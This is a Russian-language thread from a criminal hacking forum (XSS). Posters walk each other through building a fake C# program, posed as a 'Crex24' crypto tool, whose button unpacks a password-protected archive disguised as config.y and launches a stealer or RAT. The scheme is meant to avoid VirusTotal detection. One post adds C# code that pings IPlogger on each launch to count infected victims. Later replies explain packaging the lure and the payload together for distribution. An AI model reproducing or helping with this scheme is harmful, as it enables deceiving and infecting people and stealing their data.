• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Получаем тематические загрузки вашего exe без слива на ВТ вашей малвари

1. Да же при смене расширения он как был архивом zip так и остается
2. Что бы школяр если вдруг вскроет наш exe не смог увидеть пароль в открытом виде

Приветствую,
У вас написано:
Жмем 2 раза на кнопку Start и пишем код распаковки и запуска:
Далее разбор кода, вы так же можете скачать уже готовые исходники в конце статьи.

Start это Пуск - верно? А куда именно код вставлять?

И второй вопрос:
Если использовать готовое решение:
Crex24.zip - AnonFiles

Фаилы из Crex24 необходимо скомпилировать?
Если да чем это лучше сделать?

И где можно менять пароль на архив и имя архива.
Я имею ввиду в каком файле?

Пожалуйста, обратите внимание, что пользователь заблокирован
1. У меня приведен общий код, т.е удаляете все из редактора и вставляете свое, не забыв namespace на свое имя проекта.
2. Все делалось в Visual Studio 2019
3:
e8145deb8e.jpg

Блин, ТС подсадил часть форума на программирование на C# :):):)
Может кому и припечет заняться обучением) с C# по-моему сейчас все и начинают добираясь до WinApi
Рад если кому то помог встать на пусть истинный :zns6:

Раз зашла статья то немного дополню.
Сделаем отстук на IPlogger что бы при каждом запуске программы в не зависимости от того сработан ваш exe из архива или нет мы видели сколько человек запустило софт/фейковую форму.
Тогда вы сможете анализировать сколько реально человек скачало и запустило чистую форму и сколько у вас отстучал ваш exe стиллер/рат или еще что. Ну и делать выводы собственно по процентному соотношению)

Код:
https://iplogger.ru/
Для начала создадим "Невидимый логгер":

17cc16cc7b.jpg

Копируем ссылки:

d10f623317.jpg

Щелкаем по нашей форме в пустом месте 2 раза, откроется редактор кода пишем следующий код там где показано в самом низу:

C#:
public static void Get(string url)
        {
            try
            {
                WebRequest webRequest = WebRequest.Create(url);
                webRequest.Credentials = CredentialCache.DefaultCredentials;
                webRequest.Headers.Add("Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3");
                ((HttpWebRequest)webRequest).UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";
                return new StreamReader(webRequest.GetResponse().GetResponseStream()).ReadToEnd();

}
            catch (Exception)
            {
                return null;
            }

}

f188178d27.jpg

А этот код почти в самом верху, заранее изменив ссылку для сбора статистики на свою из IPlogger что мы создали выше:

a2XoXw6hwPNNMm.jpg

Вот и все, теперь при запуске софта сразу будет отстук на IPlogger где вы увидите IP и страну бота, статистика доступна по ссылке что я указал на скрине выше:

4cf94f1f2f.jpg

п/с, могут появляться детекты, т.к это уже будет не совсем простой разархиватор...

Последнее редактирование:
Раз зашла статья то немного дополню.
Сделаем отстук на IPlogger что бы при каждом запуске программы в не зависимости от того сработан ваш exe из архива или нет мы видели сколько человек запустило софт/фейковую форму.
Тогда вы сможете анализировать сколько реально человек скачало и запустило чистую форму и сколько у вас отстучал ваш exe стиллер/рат или еще что. Ну и делать выводы собственно по процентному соотношению)

Код:
https://iplogger.ru/
Для начала создадим "Невидимый логгер":

17cc16cc7b.jpg

Копируем ссылки:

d10f623317.jpg

Щелкаем по нашей форме в пустом месте 2 раза, откроется редактор кода пишем следующий код там где показано в самом низу:

C#:
public static void Get(string url)
        {
            try
            {
                WebRequest webRequest = WebRequest.Create(url);
                webRequest.Credentials = CredentialCache.DefaultCredentials;
                webRequest.Headers.Add("Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3");
                ((HttpWebRequest)webRequest).UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0";
                return new StreamReader(webRequest.GetResponse().GetResponseStream()).ReadToEnd();

}
            catch (Exception)
            {
                return null;
            }

}

f188178d27.jpg

А этот код почти в самом верху, заранее изменив ссылку для сбора статистики на свою из IPlogger что мы создали выше:

a2XoXw6hwPNNMm.jpg

Вот и все, теперь при запуске софта сразу будет отстук на IPlogger где вы увидите IP и страну бота, статистика доступна по ссылке что я указал на скрине выше:

4cf94f1f2f.jpg

п/с, могут появляться детекты, т.к это уже будет не совсем простой разархиватор...
если этот код вставить в клиппер на шарпе будет работать?

если этот код вставить в клиппер на шарпе будет работать?
Будет везде работать на C#.

1. У меня приведен общий код, т.е удаляете все из редактора и вставляете свое, не забыв namespace на свое имя проекта.
2. Все делалось в Visual Studio 2019
3:

Спасибо но вопрос остался.

Я тоже использую Visual Studio 2019

Далее по шагам:

У вас написано:
Жмем по вкладке Проект > управление пакетами
Вкладка обзор, в поле поиска вводим SharpZipLib нужен для распаковки архива устанавливаем
После в поле поиска вводим Costura.Fody запихнет вашу dll SharpZipLib в сам билд формы что бы не таскать его отдельно, и так же установить.

Установил. Результат рис ниже. (форма не отформатирована, но пока не заморачивался. По этому она отличается
от вашей размером полей и тп)

1.jpg

Далее у вас написано:

Нажал. Результат на рис ниже:
2.jpg

Далее пишете:
. У меня приведен общий код, т.е удаляете все из редактора и вставляете свое, не забыв namespace на свое имя проекта.

Понятно что код нужно под себя редактировать.
Не понятно что по шагам делать далее ?
1.Что значит удаляете все из редактора?
Удалить код формы и вставить код разархиватора, а далее его скомпилировать в exe ?
2.Если да как назвать этот exe файл и в какую дирр его сохранить?
3.И как его привязать что бы при нажатии на кнопку старт этот exe запускался?
4. В вашем готовом варианте Crex24.zip - AnonFiles в каком файле разархиватор или его там нет?

на кнопку старт 2 раза нажимай и удаляй все оттуда и вставляй код разархиватора, меняй Debug на release и нажимай кнопку плей в папке проекта bin \ release будет твой exe

Спасибо но вопрос остался.

Я тоже использую Visual Studio 2019

Далее по шагам:

У вас написано:
Жмем по вкладке Проект > управление пакетами
Вкладка обзор, в поле поиска вводим SharpZipLib нужен для распаковки архива устанавливаем
После в поле поиска вводим Costura.Fody запихнет вашу dll SharpZipLib в сам билд формы что бы не таскать его отдельно, и так же установить.

Установил. Результат рис ниже. (форма не отформатирована, но пока не заморачивался. По этому она отличается
от вашей размером полей и тп)

Посмотреть вложение 6449

Далее у вас написано:

Нажал. Результат на рис ниже:
Посмотреть вложение 6450

Далее пишете:
. У меня приведен общий код, т.е удаляете все из редактора и вставляете свое, не забыв namespace на свое имя проекта.

Понятно что код нужно под себя редактировать.
Не понятно что по шагам делать далее ?
1.Что значит удаляете все из редактора?
Удалить код формы и вставить код разархиватора, а далее его скомпилировать в exe ?
2.Если да как назвать этот exe файл и в какую дирр его сохранить?
3.И как его привязать что бы при нажатии на кнопку старт этот exe запускался?
4. В вашем готовом варианте Crex24.zip - AnonFiles в каком файле разархиватор или его там нет?
Если при двойном клике на форму или кнопку не открывается редактор когда просто нажми F7 и редактируй как нужно.
В коде называй как хочешь
Сама форма с готовым кодом и есть разархиватор

т.к тебе нужно что бы при нажатии на кнопку срабатывала распаковка твоего архива с паролем, надо перейти к коду кнопки, щелкни по ней правой кнопкой мыши "если двойной клик не открывает код" и нажми перейти к коду. далее смотри в моем коде как прописан код для кнопки и делай так же.

По логике должно все быть понятно. Я не знаю куда уж проще расписать все. Может посмотрите уроки для начинающих программистов C# в VS на ютубе?, хотя бы пару уроков основы понять, потом уже делать что то из моей темы, думаю будет попроще.

По логике должно все быть понятно. Я не знаю куда уж проще расписать все. Может посмотрите уроки для начинающих программистов C# в VS на ютубе?, хотя бы пару уроков основы понять, потом уже делать что то из моей темы, думаю будет попроще.

Попробую. Учитывая ваши пояснения иkaha

В любом случае спсб всем.
Что касается последнего замечания насчет уроков я полностью согласен.
Но было бы классно для тех кто начинает с нуля подобные статьи сопровождать
Ссылками на конкретные уроки по теме. (либо делать пошаговую инструкцию)
Как правило, людям которые глубоко в теме предмета трудно поставить себя на место того кто совсем не знаком с материалом. Поэтому мужьям например не рекомендуют учить жен водить авто. Кроме бакланки это, как правило, ни к чему не приводит.

на кнопку старт 2 раза нажимай и удаляй все оттуда и вставляй код разархиватора, меняй Debug на release и нажимай кнопку плей в папке проекта bin \ release будет твой exe

1. Сделал. В результате VS выдает ошибки.
2. У ТС в начале есть готовое решение - то что должно получиться. Crex24.zip - AnonFiles .
В нем, в папке проекта bin \ release нет EXE фаила.
3. Код разархиватора содержится в фаиле Form1.cs а не в bin \ release \ exe

Если при двойном клике на форму или кнопку не открывается редактор когда просто нажми F7 и редактируй как нужно.
В коде называй как хочешь
Сама форма с готовым кодом и есть разархиватор

т.к тебе нужно что бы при нажатии на кнопку срабатывала распаковка твоего архива с паролем, надо перейти к коду кнопки, щелкни по ней правой кнопкой мыши "если двойной клик не открывает код" и нажми перейти к коду. далее смотри в моем коде как прописан код для кнопки и делай так же.

Сделал. В результате VS выдает ошибки.
Могу видос записать по шагам, что делал, но думаю это лишнее.
Заё ... дальше не удобно. Буду учить VS и C#

Чтобы время небыло потрачено зря может расскажите как использовать Crex24.zip - AnonFiles .
Как exe фаил получить для запуска вируса из архива.

Crex24 это просто фейк. можно просто создать форму и сделать большую зеленую кнопку и назвать "бабло":) , и в этой кнопке прописать код для разархивации. потом берешь свой вирус любой называешь update.exe, (если не менял в коде) и в 7zip пакуешь с паролем, потом переименовываешь в config.y чтобы поменялось расширение. в панели управление\ параметры папок\ вкладка вид, убрать галочку скрывать расширения.

Crex24 это просто фейк. можно просто создать форму и сделать большую зеленую кнопку и назвать "бабло":) , и в этой кнопке прописать код для разархивации. потом берешь свой вирус любой называешь update.exe, (если не менял в коде) и в 7zip пакуешь с паролем, потом переименовываешь в config.y чтобы поменялось расширение. в панели управление\ параметры папок\ вкладка вид, убрать галочку скрывать расширения.

Похоже ты совсем меня не понимаешь.
Ясно что это эминтация программы и кнопка нужна для запуска разархиватора ..... Я вообще понимаю что это и что с этим делать дальше, что на мой взгляд самое главное.
По шагам:
1. Я беру код который ТС разместил в начале темы и пытаюсь скомпилировать. Вылезают ошибки. (ты сам пробовал кстати?)
2. ТОгда у меня простой вопрос как сделать exe из того готового исходника который он выложил в начале темы.
В результате же exe шник должен получиться и config.y с config.y всё просто. А exe как получить?
Меня только это интересует. То что земля круглая я знаю.

Похоже ты совсем меня не понимаешь.
Ясно что это эминтация программы и кнопка нужна для запуска разархиватора ..... Я вообще понимаю что это и что с этим делать дальше, что на мой взгляд самое главное.
По шагам:
1. Я беру код который ТС разместил в начале темы и пытаюсь скомпилировать. Вылезают ошибки. (ты сам пробовал кстати?)
2. ТОгда у меня простой вопрос как сделать exe из того готового исходника который он выложил в начале темы.
В результате же exe шник должен получиться и config.y с config.y всё просто. А exe как получить?
Меня только это интересует. То что земля круглая я знаю.
config.y ты делаешь сам с помощью 7zip например, это же архив с твоим вирем под паролем, в моих исходниках его нет, да и зачем?
После ты кладешь рядом 2 файла FakeForm.exe + config.y так и распространяешь. В 1 zip архиве/папке например

config.y ты делаешь сам с помощью 7zip например, это же архив с твоим вирем под паролем, в моих исходниках его нет, да и зачем?
После ты кладешь рядом 2 файла FakeForm.exe + config.y так и распространяешь. В 1 zip архиве/папке например

Понятно всё с cofig.y
Как FakeForm.exe сделать по шагам из твоего исходника Crex24.zip - AnonFiles . ?

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх